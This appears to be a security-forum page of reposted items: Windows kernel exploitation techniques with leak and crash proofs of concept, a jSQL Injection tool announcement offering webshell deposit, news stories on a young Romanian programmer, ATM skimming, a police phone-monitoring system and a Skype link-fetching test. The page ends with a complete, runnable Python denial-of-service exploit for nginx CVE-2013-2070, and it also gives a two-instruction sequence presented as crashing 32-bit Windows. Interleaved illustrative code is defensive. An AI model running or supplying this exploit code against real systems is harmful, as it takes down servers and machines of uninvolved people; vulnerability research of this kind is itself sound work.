“nt!memcpy (and the like) reverse copying order” – certain implementations of memcpy, memmove, RtlCopyMemory and RtlMoveMemory found in the kernel and third-party drivers alike handle the “overlapping regions” corner case by reversing the copy order from the intuitive left-to-right to right-to-left. By starting to write at the end of the destination memory region, these functions make certain buffer overflow vulnerabilities easier to exploit, because a (relative) write-what-where condition can be provoked. While the technique works best for a kernel-to-user copy on 64-bit platforms, it can also be applied to a number of other scenarios. For more information, please refer to the “Memory Copy Functions in Local Windows Kernel Exploitation” article published last year in the Hack in the Box Magazine, Issue 009. The Proof of Concept source code of a vulnerable device driver and the exploit used during the live demonstration can be found at memcpy_ioctl.zip (3.9kB, ZIP). Note that the code has only been confirmed to be susceptible to a stack cookie bypass when built with WDK 7600.16385.1 for Windows 7 (x64 Free Build), although it should generally work for any 64-bit target.
“nt!memcmp double-fetch” – an interesting behavior found in the Windows 8 32-bit implementation of the nt!memcmp standard function, making it possible to fake matching regions when a user-mode pointer is passed as one of the function’s parameters. Due to lack of time, this was not covered at NSC; however, our SyScan’13 slides and paper explain the problem thoroughly.
“PAGE_GUARD and kernel code execution flow” – a technique already described in the “Fun facts: Windows kernel and guard pages” and “A story of win32k!cCapString, or unicode strings gone bad.” blog posts.
“SegSs, LDT_ENTRY.HighWord.Bits.Default_Big and IRETD” – due to how the “Big“ LDT entry flag in the SS: segment descriptor is handled by the IRETD instruction used for cross-privilege-level transfers in Windows, it is possible to have the CPU disclose the upper 16 bits of the current thread’s kernel stack pointer in 32-bit versions of Windows.
Proof of Concept source code: small_seg.zip (1kB, ZIP).
Example output:
    Z:\>smallseg.exe
    [+] High word of kernel stack address: 94070000
    Z:\>smallseg.exe
    [+] High word of kernel stack address: 94010000
    Z:\>smallseg.exe
    [+] High word of kernel stack address: 956b0000
“Windows 32-bit Trap Handlers” – the lack of proper sanitization of the previous CPL inside several trap handlers used in 32-bit Windows can be leveraged to disclose addresses of several internal ntoskrnl.exe (or equivalent) symbols in the kernel address space, effectively defeating kernel ASLR (not that it matters much for this particular OS).
Proof of Concept source code: kitrap01.zip (1.3kB, ZIP) and kitrap0e_addr.zip (1.4kB, ZIP).
Example outputs:
    Z:\>kitrap01.exe
    [+] Kernel image base: 8320c000, size: 413000
    [+] Iteration 3d000 / 413000
    [+] nt!KiFastCallEntry address: 83249790
    Z:\>kitrap0e.exe
    [+] Kernel image base: 8320c000, size: 413000
    [+] Iteration 3d000 / 413000
    [+] Leaked address: 8324984c
    [+] Leaked address: 83249887
    [+] Iteration 41000 / 413000
    [+] Leaked address: 8324d4ed
    [+] Iteration 412000 / 413000
“Crashing Windows and leaking bits” – the primary focus area of the overall talk. As it turns out, the nt!KiTrap0e #PF trap handler trusts the KTRAP_FRAME.Ebp field to be a valid kernel-mode pointer when processing faults occurring at specific, magic Eip values.
Again, due to lack of proper KTRAP_FRAME.SegCs sanitization, it is possible to craft a frame with a controlled Eip and the user-mode Ebp register, allowing a local attacker to crash the system via an invalid memory reference, or otherwise disclose the least significant bit of any byte in the kernel address space. The two instructions capable of crashing all 32-bit Windows NT-family systems as of today are as follows:
    xor ebp, ebp
    jmp 0x8327d1b7
where 0x8327d1b7 is the nt!KiSystemServiceAccessTeb address on the demo system (the kernel image base in the outputs above is 8320c000; the address differs between kernel builds). Proof of Concept source code: kitrap0e_bsod.zip (0.5kB, ZIP), kitrap0e_leak_bits.zip (1.4kB, ZIP) and kitrap0e_addr_space.zip (1.5kB, ZIP). The programs unconditionally crash the operating system, allow disclosing specific bits of the kernel memory and scan the kernel address space layout, respectively. Source: NoSuchCon’13 and crashing Windows with two instructions | j00ru//vx tech blog
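The first item in the list above, the reverse copying order of overlap-aware memcpy/memmove implementations, is easy to see in a traced model. The following is an added example written for this page, not j00ru's code and not the Windows nt!memcpy implementation: it performs a memmove-style copy inside a byte arena with a constructed layout (a 16-byte buffer at offset 8 followed by 8 bytes standing in for whatever sits after it; these offsets and the copy length are assumptions) and records the order in which destination bytes are written. With an oversized, attacker-chosen length and an overlapping source, the first byte written is dst + n - 1, so everything past the end of the buffer is written before a single in-bounds byte is.

```python
"""
Copy-direction demonstration for the "reverse copying order" item above.
Added illustration, not j00ru's code and not Windows nt!memcpy: an
overlap-aware memmove is modelled in a traced byte arena so the write order
can be inspected. Layout, offsets and lengths are constructed for the demo.
"""

ARENA_SIZE = 64
BUF_OFF, BUF_LEN = 8, 16                        # constructed layout: 16-byte buffer at offset 8
COOKIE_OFF, COOKIE_LEN = BUF_OFF + BUF_LEN, 8   # 8 bytes that sit right after the buffer


def copy_is_backwards(dst, src, n):
    """Direction rule of a textbook memmove (assumption: real implementations
    differ in detail but make the same choice): if the destination starts
    inside the source range, copy right-to-left so the source is not
    clobbered before it is read; otherwise copy left-to-right."""
    return n > 0 and src < dst < src + n


def traced_copy(dst, src, n, arena=None):
    """Perform the copy inside a byte arena and return the destination
    offsets in the order they were written."""
    if arena is None:
        arena = bytearray(range(ARENA_SIZE))
    if dst + n > len(arena) or src + n > len(arena):
        raise ValueError("copy leaves the arena")
    order = range(n - 1, -1, -1) if copy_is_backwards(dst, src, n) else range(n)
    trace = []
    for i in order:
        arena[dst + i] = arena[src + i]
        trace.append(dst + i)
    return trace


def oversized_copy_demo(n):
    """Copy n (> BUF_LEN) bytes into the buffer at BUF_OFF from an overlapping
    source at offset 0: the shape of an overflow with an attacker-controlled
    length that lands in the backward-copy path."""
    trace = traced_copy(BUF_OFF, 0, n)
    in_bounds = range(BUF_OFF, BUF_OFF + BUF_LEN)
    first_in_bounds = next(i for i, off in enumerate(trace) if off in in_bounds)
    cookie = range(COOKIE_OFF, COOKIE_OFF + COOKIE_LEN)
    return {
        "first_write": trace[0],                    # dst + n - 1 for a backward copy
        "out_of_bounds_writes_before_any_in_bounds_write": first_in_bounds,
        "cookie_written_before_buffer_start": all(
            trace.index(c) < trace.index(BUF_OFF) for c in cookie),
    }
```

The practical consequence is the one the post names: because the length selects where the first write lands, a bounded-looking copy turns into a relative write that starts far from the buffer, and the in-bounds part of the buffer is only reached last. A forward-copying implementation of the same call writes offset dst first, which is why the two behave so differently under the same overflow.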
  8. Nytro

    New category

    Screw your offers.
  9. Nytro

    New category

    Geniuses: https://rstforums.com/forum/external.php?type=RSS2&forumids=59
  10. Nytro

    New category

    Let's see what comes of it... Show me what you've got: https://rstforums.com/forum/oferte.rst
  11. [h=1]jSQL Injection v-0.4 : a java tool for automatic database injection[/h] May 21, 2013 · by Terry Update jSQL Injection v-0.4 : a java tool for automatic database injection. Version 0.4 features:
GET, POST, header, cookie methods
Normal, error based, blind, time based algorithms
Automatic best algorithm selection
Multi-thread control (start/pause/resume/stop)
Progress bars
Shows URL calls
Simple evasion
Proxy setting
Remote file reading
Webshell deposit
Terminal for webshell commands
Configuration backup
Update checker
Admin page checker
Brute forcer (md5 mysql…)
Coder (encode decode base64 hex md5…)
Supports MySQL
jSQL Injection is a lightweight application used to find database information from a remote server. jSQL is free, open source and cross-platform (Windows, Linux, Mac OS X, Solaris). Next work:
+ remote table writing [sqli]
+ remote file writing [sqli]
+ reverse tcp shell deposit [sqli]
+ privilege elevation [sqli]
+ speed increase (non encoding pass): 50% faster [sqli]
+ control all running tasks in a tab [gui]
# speed test comparison with other injection tools [dev]
# automatic code testing (JUnit) [dev]
# wiki pages [site]
Download: jsql-injection-v0.4.jar (1.2 MB) Find Other Version | Sources: https://code.google.com/p/jsql-injection/ Our Post before: Update jSQL Injection v-0.3 : a java tool for automatic database injection. Source: Update jSQL Injection v-0.4 : a java tool for automatic database injection.
  12. [h=1]The Little Genius from Hackerville Who Conquered the USA[/h] The story of the Romanian who turned down offers from Google. Everyone knows Ionuț Budișteanu from television, from the newspapers or from the stories about "what inventions Romanians have come up with now". In fact, few people know him personally, because he spends nearly 16 hours a day at the computer, inventing programs for which he has received more than a hundred awards. He doesn't go to the park, doesn't go out for a beer with friends, and the last book he read was in second grade. He doesn't regret it, because for him computer science sums up every possible passion. When I first met Ionuț, all I knew was that he is a genius, or at least that is how those who had met him before described him. He doesn't say the same thing; he introduces himself as "a kid who studies a lot". I also knew that he had invented a program with which blind people can distinguish objects, that he had been courted by the biggest universities in the USA and that he had impressed countless juries with his projects. From the emails we exchanged before we officially met, I imagined he was a very polite person. And I wasn't wrong. Ionuț uses the formal form of address, says "Thank you!" as often as he can, and talks about his projects modestly, calmly, but with self-assurance. After a conversation in which he explained to me how his inventions work, he pulled a stack of diplomas out of a backpack. About 130. "I also brought some diplomas from the competitions I took part in," he tells me calmly. The first one I noticed was one awarded by Yale University. Several others followed from Taiwan, Azerbaijan, the Netherlands, and the list goes on. He told me he had taken part in competitions abroad 13 times and in many others in Romania. He is only 18, and the competition adventure began in fifth grade. The passion for the computer and everything that can be done with it, much earlier. Ionuț saw his first computer at the age of 3. His parents had lent
someone a sum of money, which that person could not pay back. In exchange, he gave them a Pentium 386. "There was only one other computer in the whole town at the time," he jokes. Although in Râmnicu Vâlcea, the town where he still lives, there were not many such machines on which to learn how to use them, that didn't stop him from working out on his own how they function. He began experimenting with games of every kind. He remembers that at 4 he knew how to save his game by himself, recognised the words and commands that helped him do it, and would not leave his new toy. More than 1,000 games followed, which he bought over the internet, until he realised he had to move to the next level. He had become bored, and now he wanted to invent games, not play them. So, in third grade, he tried to make his own games, reading up on the instructions of the well-known ones, the documentation of applications and specialist books. Although none of these documents were in Romanian, he says, relaxed, that "I understood what I was reading, after all, my operating system was in English". He was interested in 3D animation, and at the time The Lord of the Rings was all the rage in that department. He too tried to create similar things and managed to make explosions and characters, but could not animate them. For a short while he thought that perhaps what he was trying to do wasn't for him. He continued to experiment with applications, trying to learn how they work. Meanwhile, his classmates at school were learning to use Microsoft Word and Excel, and the computer science teacher asked him to type up her documents, because he typed fast. He also showed her what he was working on by himself, but she didn't believe him. Things were not very simple from fifth grade on either. He was learning a new programming language, based mainly on turning recreational mathematics problems into computer science, which interested him less than 3D effects, animations or other applications.
To hold his attention, the teacher promised to help him finish the game he was working on if he also did what was in the curriculum. He accepted, but that did not stop him from continuing his programming work at home. From time to time he would bring his teacher a CD with what he had been working on. "She was puzzled as to how I made the applications without actually knowing the basic instructions. She didn't really believe me when she saw what I was doing," he says, laughing. In middle school, Ionuț had turned into the modern, technological version of the fairy-tale characters who grow in one year as much as others do in ten. He absorbed information faster than other classmates and invented programs at a furious pace. He began going to national computer science competitions, where he applied what he learned at school, but he did not abandon his passions either. He studied at home, alone, from academic computer science papers, treatises and other things of no interest to children his age. He had not gone out to play in front of the apartment block since he was nine. He didn't feel the need; computer science filled his time the way he liked. "Sometimes I'd fall asleep with my head on the keyboard and wake up the next morning." "Didn't your parents scold you for spending too much time at the computer?" I ask him. "They didn't. They realised I wasn't playing any more, but using my time productively. The computer is a tool for making money or for developing yourself." At school he had begun to stand out from his classmates. He tried to always bring his laptop or specialist books to the classroom, so as not to lose a single moment of study. "Ionuț caught my attention because he was the only one in the class absorbed in computer science books during breaks," says his mathematics teacher, Irinel Dafincescu. She met him when he was in seventh grade. He was preparing for the national olympiads and asked his teacher for help with a few questions he had in mathematics. Since then, Irinel Dafincescu has been an important teacher for Ionuț.
She encouraged him at every competition he took part in. "After he came back loaded with international prizes of overwhelming importance, nothing changed in his manner, there was no trace of arrogance in his behaviour and he kept working with the same perseverance," recalls the mathematics teacher. In ninth grade he moved up a level with the projects he works on: he went to the USA for the first time. Veni, vidi, vici style, he won first prize right away from the Association for Computing Machinery (ACM), the largest scientific and academic association in the field of computer science. ACM awards the Turing Award, the computer science version of the Nobel, and at its gala Ionuț received one of the 12 prizes awarded that year. He was the youngest of the 12, the only one who did not yet have an academic research career. In the meantime he has grown used to being the youngest at the competitions he enters, especially in ninth or tenth grade, when everyone else was in twelfth. That did not stop him from winning prizes almost every time. "Competitions like these have more than 1,000 participants," he explains to me, "and among us there is respect, because we all know how hard we worked." Respect, as he made me understand, is very important to Ionuț. "It doesn't matter how old you are, it matters who you are," he told me once, when I tried to persuade him to address me informally, since I am not many years older than he is. The success of his first trip to the States brought him an invitation from the University of San Francisco to become their student right then, even though he was only in ninth grade. Ionuț did not agree. "I was too young, I would have been too far from my parents," he tells me, smiling. He believes he should not have skipped stages and that school was useful to him. Although he deals exclusively with computer science and no longer has time for other subjects, he tells me that school showed him how to learn. And, as
was to be expected, the internet is a good friend for learning too, so he is a persistent autodidact, using online courses in biology, physics or other areas of interest. While at first he used master's-level courses, now he studies complicated doctoral papers on his own. After the American prizes and experiences he became a member of ACM and IEEE, the largest professional associations of their kind in the world. He has been awarded by Intel repeatedly and was invited by Google Switzerland to work for them when he was in eleventh grade, but he turned them down. "I don't want to be one of the 7,000 programmers who all do the same work." He believes it is more useful to humanity if ten programmers joined forces to work on innovative research. He wants to become a university professor, and alternative proposals do not attract him. He realises that his enthusiasm and potential would be lost in bureaucratic work or in places where marketing matters more than research in computer science or artificial intelligence. The best known and most awarded of his projects was the program that helps blind people distinguish objects. Inspired by his uncle, who had lost his sight many years earlier, he wanted to create a cheap device that would be of use to those with this affliction. Before that he had gained experience in artificial intelligence, working on an encephalograph and reading countless studies on the internet. He quickly realised that the organ that can send signals to the brain in a way similar to the eyes is the tongue. So he created multi-purpose software and a device placed on the tongue, through which, in practice, the blind person recognises different objects. Ionuț tested the invention on his uncle for several weeks. Using a video camera he captured various simple objects. The device processes the information and sends it to a sensory matrix placed on the tongue, and this matrix generates
a level of electricity directly proportional to the intensity of the image. With practice, the brain gets used to it and begins to recognise different objects. After repeated attempts, his uncle could distinguish even a large part of the letters of the alphabet. Before this project, Ionuț had also invented a program to recognise the faces of thieves who wear balaclavas during their attacks, had worked on natural-disaster recognition software and on many other projects, all awarded abroad. Where do the ideas for these things come from? At the competitions he attends so often, various themes are proposed through which the world could be helped. Now he is working on an autonomous car. "You mean a car that drives itself?" I ask, trying to verify information I thought possible only in science-fiction films. He confirms and tells me it will be the second car of this kind invented in the world. A host of Stanford researchers worked on the first one. One of the professors there gave lectures on the subject, but did not give away the big secret, leaving people like Ionuț to innovate. He wants to improve on that car by building it with a radar far cheaper than the one used by the Americans. The latter would have cost several tens of thousands of dollars, whereas his would be around 2,000. "Do you see this Gaussian?" he points, relaxed, at the laptop screen, where he was just showing me exactly how the autonomous car's software works. I try to understand how a car can drive itself, and the answer seems fairly simple: it identifies road markings and signs, obstacles and curves, and manages to drive without us steering it. To complete his project, he received a car from Dacia Renault and the "Dan Voiculescu Foundation". I asked him whether he has a licence for it. "I don't have a licence, I'm not interested in that. I want to make a car that drives itself."
At one point, some of his teachers began to wonder whether his genius might be dangerous. While he was preparing inventions to help humanity, in Râmnicu Vâlcea the police were arresting 30 hackers for serious computer fraud, a story that led the American press to nickname the town Hackerville. So, when he was in eighth grade, the school principal was asked to ban Ionuț from the computer lab, "because the FBI might come to the school", he recalls, amused. "That isn't hacking, it's phishing. It's something else," he explains to me about the link between the FBI and his teachers' suspicions. He explained that hacking actually means exploiting the vulnerabilities of websites, which is very easy. In sixth grade he wanted to show the people running a Romanian website a few problems, but they didn't believe him. To prove he was right, he changed a few minor things. Frightened, they wanted to sue him, but Ionuț didn't even have an ID card at the time, so they left him alone. That was the last time he tried what might be called "white hat hacking". People don't quite believe that he isn't into the same things as those people from Vâlcea who made the town famous abroad. Some teachers in high school reproached him that the programs he invents weren't real, that he "self-plagiarises" and that in fact he was just a little hacker. In high school, someone sent the teachers compromising emails, and he was the first to be accused. But Ionuț wouldn't have time for hacking. "Could I persuade you to read a story?" I propose. "Oh, no, no," he laughs. He prefers films, of which he watches at most 20 a year. His favourite film, which might have something to do with his great passion, is Terminator, because it raises the new things technology will create in the future. He says he doesn't waste his time watching films at random, because
that isn't his hobby. His only passion is computer science, and his only friends are also people connected to this subject, generally met at the international competitions he goes to. "Do you want to go on holiday somewhere after you finish the autonomous car?" I ask him. He tells me the flights abroad for competitions are enough; there he gets everything he wants. The last time I spoke with Ionuț he was hurrying to get home, to study some more. Although he has a scholarship of 40,000 dollars, which he can use at any university in the States, he prefers to study anyway, because he enjoys it. He wants to go to Carnegie Mellon, because he feels it would suit him better than Yale or Stanford. UPDATE: On 17 May, Ionuț won the 75,000-dollar grand prize of the International Science and Engineering Fair (ISEF), organised by Intel in Arizona, USA, for developing the autonomous car project. Photo: Ioana Văcărașu, Mihai Dăscălescu Source: Micul geniu din Hackerville care a cucerit SUA
  13. Oh no, RST isn't working for me any more, it's getting DDoSed from 3 IPs
  14. [h=1][cryptography] skype backdoor confirmation[/h]Adam Back adam at cypherspace.org Thu May 16 15:52:24 EDT 2013 So when I saw this article Skype with care – Microsoft is reading everything you write - The H Security: News and Features I was disappointed the rumoured skype backdoor is claimed to be real, and that they have evidence. The method by which they confirmed is kind of odd - not only is skype eavesdropping but it's doing head requests on SSL sites that have urls pasted in the skype chat! Now I've worked with a few of the german security outfits before, though not Heise, and they are usually top-notch, so if they say it's confirmed, you generally are advised to believe them. And the date on the article is a couple of days old, but I tried it anyway. Set up a non-indexed /dev/urandom generated long filename, and saved it as php with a meta-refresh to a known malware site in case that's a trigger, and a passive html with no refresh and no args. Passed a username password via ?user=foo&password=bar to the php one and sent the links to Ian Grigg who I saw was online over skype with strict instructions not to click. To my surprise I see these two entries in the apache SSL log:
    65.52.100.214 - - [16/May/2013:13:14:03 -0400] "HEAD /CuArhuk2veg1owOtiTofAryib7CajVisBeb8.html HTTP/1.1" 200 -
    65.52.100.214 - - [16/May/2013:14:08:52 -0400] "HEAD /CuArhuk2veg1owOtiTofAyarrUg5blettOlyurc7.php?user=foo&pass=yeahright HTTP/1.1" 200 -
I was using skype on ubuntu, Ian on the other end was using MAC OSX. It took about 45mins until the hit came so they must be batched. (The gap between the two requests is because I did some work on the web server as the SSL cert was expired and I didn't want that to prevent it working, nor something more script like with cgi arguments as in the article).
Now are they just hoovering up the skype IMs via the new microsoft central server architecture having back doored skype client to no longer have end2end encryption (and feeding them through echelon or whatever) or is this the client that is reading your IMs and sending selected things to the mothership. btw their HEAD request was completely ineffective per the weak excuse microsoft offered in the article at top my php contained a meta-refresh which the head won't see as it's in the html body. (Yes I confirmed via my own localhost HTTP get as web dev environments are automatic in various ways). So there is adium4skype which allows you to use OTR with your skype contacts and using skype as the transport. Or one might be more inclined to drop skype in protest. I think the spooks have been watching "Person of Interest" too much to think such things are cricket. How far does this go? Do people need to worry about microsoft IIS web servers with SSL, exchange servers? You do have to wonder if apple backdoored their IM client, below the OTR, or silent circle, or the OS - I mean how far does this go? Jon Callas said not apple, that wouldn't be cool, and apple aims for coolness for users; maybe he should dig a little more. It seems to be getting to you can't trust anything without compiling it from source, and having a good PGP WoT network with developers. A distro binary possibly isn't enough in such an environment. Adam Source: [cryptography] skype backdoor confirmation
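The experiment in the message above is a canary-link test: paste an unguessable URL into the channel under test and watch the web server's access log for anyone other than the recipient fetching it. The following is an added example written for this page, not Adam Back's code: it generates such a URL, parses Apache common/combined-format log lines and reports hits on canary paths from addresses outside a trusted (recipient) range. The base host, the sample log lines and the addresses in them (documentation ranges) are constructed here and are not from the original message.

```python
"""
Canary-link check for the experiment in the message above. Added illustration,
not Adam Back's code: generate an unguessable URL, then scan Apache-format
access-log lines for requests to it from anyone but the intended recipient.
The sample log and addresses below are constructed for the demo.
"""
import re
import secrets
from ipaddress import ip_address, ip_network
from urllib.parse import urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def make_canary_url(base="https://example.invalid"):
    """Random, unindexed path: nothing legitimate knows it, so any hit is a leak."""
    return f"{base}/{secrets.token_urlsafe(24)}.html"


def canary_hits(log_lines, canary_urls, trusted_nets=()):
    """Return the requests that touched a canary path from outside trusted_nets."""
    paths = {urlsplit(u).path for u in canary_urls}
    trusted = [ip_network(n) for n in trusted_nets]
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue                                  # malformed line, skip
        path = m.group("path").split("?", 1)[0]       # match on the path, not the query
        if path not in paths:
            continue
        ip = ip_address(m.group("ip"))
        if any(ip in net for net in trusted):
            continue                                  # the recipient opening it is expected
        hits.append({"ip": str(ip), "ts": m.group("ts"), "method": m.group("method"),
                     "path": m.group("path"), "status": int(m.group("status"))})
    return hits


# Constructed sample: two canary links, the recipient on 198.51.100.0/24, and
# a third party on 203.0.113.7 issuing HEAD requests as in the message above.
CANARY_URLS = ["https://example.invalid/c-Kd8Qf2ZpA.html",
               "https://example.invalid/c-Xm3tB9Lq.php?user=foo&pass=bar"]
SAMPLE_LOG = [
    '203.0.113.7 - - [16/May/2013:13:14:03 -0400] "HEAD /c-Kd8Qf2ZpA.html HTTP/1.1" 200 -',
    '198.51.100.23 - - [16/May/2013:13:20:11 -0400] "GET /c-Kd8Qf2ZpA.html HTTP/1.1" 200 512',
    '203.0.113.7 - - [16/May/2013:14:08:52 -0400] "HEAD /c-Xm3tB9Lq.php?user=foo&pass=bar HTTP/1.1" 200 -',
    '192.0.2.44 - - [16/May/2013:14:10:00 -0400] "GET /index.html HTTP/1.1" 200 1024',
    'garbage line that does not parse',
]
```

Two details matter for a clean result: the path must be long and random so that crawlers and guessers cannot find it by accident, and the recipient's own address range must be excluded so that a genuine click is not counted as a leak. Whether a hit comes from the client or from a server in the middle cannot be decided from the log alone, which is exactly the open question the message raises.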
  15. [h=2]Jailed Romanian hacker repents, invents ATM security scheme[/h]Add-on device blocks card skimmers By Neil McAllister in San Francisco Posted in Security, 17th May 2013 20:33 GMT A Romanian man serving a five-year jail sentence for bank-machine fraud says he's come up with a device that can be attached to any ATM to make the machine invulnerable to card skimmers. Valentin Boanta was arrested in 2009 and charged with supplying ATM skimmers – devices that can be attached to ATMs to surreptitiously copy the data from unwitting users' cards – to a local organized crime gang. It was during his subsequent trial and sentencing that Boanta saw the light and traded in his black hat for a white one, Reuters reports. "Crime was like a drug for me. After I was caught, I was happy I escaped from this adrenaline addiction," Boanta told reporters from his jail cell in Vaslui, Romania. "So that the other part, in which I started to develop security solutions, started to emerge." Boanta's solution, known as the Secure Revolving System (SRS), is an ingenious one that uses mechanical rather than digital security. ATM skimmers work by installing a second, concealed card reader over the one that's built into the ATM. When an unsuspecting bank customer inserts a card into the slot, the card's magnetic stripe first runs past the read head of the skimmer, allowing it to copy all of the card's data. The transaction then proceeds as normal and the ATM returns the card to the customer, who is none the wiser. With Boanta's device installed on the ATM, however, that all changes. Customers insert their cards into the slot long side first, so that the magnetic stripe is parallel to the face of the machine. The device then rotates the card 90 degrees into the ATM, where the legitimate card reader scans the magnetic stripe, then rotates it back out again to return it to the customer. 
That rotation makes it impossible for an add-on skimmer to read the card, because the magnetic stripe never moves in a straight line until it is secure inside the ATM. While awaiting the outcome of his trial, Valentin pitched his idea to Mircea Tudor and Adrian Bizgar of Bucharest-based technology firm MB Telecom, who helped him to patent his idea and funded development of the SRS device. The design would go on to win the International Press Prize at the 41st International Exhibition of Inventions in Geneva, Switzerland, in April. Boanta, however, wasn't available to accept the award. He's currently just six months into his sentence and won't see freedom for another four and a half years. Still, his partners at MB Telecom say all credit for the SRS design should go to him. "He fully deserves such recognition," Tudor told Reuters. "He's taking part in improving Romania's image abroad and he'll surely join our team when released." MB Telecom is currently finalizing details of the commercial version of the device and expects to bring it to market in the second half of the year. Sursa: Jailed Romanian hacker repents, invents ATM security scheme • The Register
16. [h=1]Romanian Police bought a portable mobile phone monitoring system for 2.8 million lei[/h]by Adrian Dumitrache

The Romanian Police will be able to locate, identify and monitor mobile phones in the Vodafone, Orange, Cosmote and RCS&RDS networks through a portable system bought from the German company SYBORG Informationssysteme for 2.8 million lei, according to www.e-licitatie.ro.

"The system uses the method of simulating a real cell of the mobile telephony network. The system is fully mobile even while operating, with the possibility of being installed on a vehicle. The antennas used in the system are hidden from view, being disguised inside a car roof-rack frame," states the tender specification for the acquisition of the system.

The tender was initiated in December 2012 and awarded three months later to the sole bidder, SYBORG Informationssysteme.

According to the specification, the system's central unit is integrated into a case of maximum size 60x40x30 centimetres and includes directional antennas, a notebook, a network scanner and batteries. The central unit can also be connected to omnidirectional antennas through a network amplifier.

With the help of the central unit, police officers will be able to monitor GSM and UMTS communications by creating virtual cells with parameters similar to those of the real network's cells. The system allows changing the signal strength at which target phones transmit, and collecting, recording and storing in a database the IMSI and IMEI codes, as well as the time and date of the recording.

The Romanian Police also requested, through the specification, training for two employees, a process that will include 40 hours of theoretical and practical courses.

Sursa: Romanian Police bought a portable mobile phone monitoring system for 2.8 million lei - Gandul
17. nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2070)

# Exploit Title: nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2070)
# Google Dork: CVE-2013-2070
# Date: 16.05.2013
# Exploit Author: Mert SARICA - mert [ . ] sarica [ @ ] gmail [ . ] com - http://www.mertsarica.com
# Vendor Homepage: http://nginx.org/
# Software Link: http://nginx.org/download/nginx-1.4.0.tar.gz
# Version: 1.3.9-1.4.0
# Tested on: Kali Linux & nginx v1.4.0
# CVE : CVE-2013-2070

import httplib
import time
import socket
import sys
import os

# Vars & Defs
debug = 0
dos_packet = 0xFFFFFFFFFFFFFFEC
socket.setdefaulttimeout(1)
packet = 0

def chunk(data, chunk_size):
    chunked = ""
    chunked += "%s\r\n" % (chunk_size)
    chunked += "%s\r\n" % (data)
    chunked += "0\r\n\r\n"
    return chunked

if sys.platform == 'linux-i386' or sys.platform == 'linux2':
    os.system("clear")
elif sys.platform == 'win32':
    os.system("cls")
else:
    os.system("cls")

print "======================================================================"
print u"nginx v1.3.9-1.4.0 DOS POC (CVE-2013-2070) [http://www.mertsarica.com]"
print "======================================================================"

if len(sys.argv) < 2:
    print "Usage: python nginx_dos.py [target ip]\n"
    print "Example: python nginx_dos.py 127.0.0.1\n"
    sys.exit(1)
else:
    host = sys.argv[1].lower()

while packet <= 5:
    body = "Mert SARICA"
    chunk_size = hex(dos_packet + 1)[3:]
    chunk_size = ("F" + chunk_size[:len(chunk_size)-1]).upper()

    if debug:
        print "data length:", len(body), "chunk size:", chunk_size[:len(chunk_size)]

    try:
        con = httplib.HTTPConnection(host)
        url = "/mertsarica.php"
        con.putrequest('POST', url)
        con.putheader('User-Agent', "curl/7.30.0")
        con.putheader('Accept', "*/*")
        con.putheader('Transfer-Encoding', 'chunked')
        con.putheader('Content-Type', "application/x-www-form-urlencoded")
        con.endheaders()
        con.send(chunk(body, chunk_size[:len(chunk_size)]))
    except:
        print "Connection error!"
        sys.exit(1)

    try:
        resp = con.getresponse()
        print(resp.status, resp.reason)
    except:
        print " [*] Knock knock, is anybody there ? (" + str(packet) + "/5)"

    packet = packet + 1
    con.close()

print "[+] Done!"

Sursa: nginx 1.3.9-1.4.0 DoS PoC
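As an added example (not from the PoC's author and not nginx's code), the following contrasts the parsing defect class this PoC exercises with a validating parser: a 16-hex-digit chunk size that a 64-bit signed accumulator turns negative, next to a parser that bounds the value after every digit and refuses it. The accumulator width and the maximum chunk size are illustrative assumptions; the chunk-size string is the one the PoC's hex() arithmetic produces under Python 2.

```python
import string


class ChunkSizeError(ValueError):
    """Raised when a chunk-size line cannot be accepted."""


def parse_chunk_size_fixed_width(line, width=64):
    """Model of the unsafe pattern: accumulate hex digits into a fixed-width
    signed integer with no bound on digit count or magnitude.

    This is a constructed illustration of the bug class, not nginx's parser.
    It returns the value a two's-complement integer of the given width would
    hold after the wrap, so an overlong chunk size comes back negative.
    """
    mask = (1 << width) - 1
    size = 0
    for ch in line:
        if ch in ";\r\n":          # chunk extension or end of line
            break
        if ch not in string.hexdigits:
            raise ChunkSizeError("not a hex digit: %r" % ch)
        size = ((size << 4) | int(ch, 16)) & mask      # silent wrap
    if size >= 1 << (width - 1):                       # reinterpret as signed
        size -= 1 << width
    return size


def parse_chunk_size_checked(line, max_chunk=16 * 1024 * 1024):
    """Validating parser: reject before the value can grow past max_chunk.

    The bound is applied after every digit, so neither a huge digit count nor
    a large value ever reaches the size bookkeeping that follows the parse.
    """
    size = 0
    ndigits = 0
    for ch in line:
        if ch in ";\r\n":
            break
        if ch not in string.hexdigits:
            raise ChunkSizeError("not a hex digit: %r" % ch)
        ndigits += 1
        size = size * 16 + int(ch, 16)
        if size > max_chunk:
            raise ChunkSizeError("chunk size exceeds %d bytes" % max_chunk)
    if ndigits == 0:
        raise ChunkSizeError("missing chunk size")
    return size


def classify_chunk_size(line, **kw):
    """Return ('ok', size) or ('rejected', reason) for one chunk-size line."""
    try:
        return ("ok", parse_chunk_size_checked(line, **kw))
    except ChunkSizeError as exc:
        return ("rejected", str(exc))


# The chunk-size line the PoC above sends: dos_packet + 1 is 0xFFFFFFFFFFFFFFED,
# and its string surgery yields these 16 hex digits.
POC_CHUNK_SIZE = "FFFFFFFFFFFFFFED\r\n"


if __name__ == "__main__":
    print("fixed-width model:", parse_chunk_size_fixed_width(POC_CHUNK_SIZE))  # -19
    print("checked parser:", classify_chunk_size(POC_CHUNK_SIZE))
    print("ordinary chunk:", classify_chunk_size("b;ext=1\r\n"))
```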
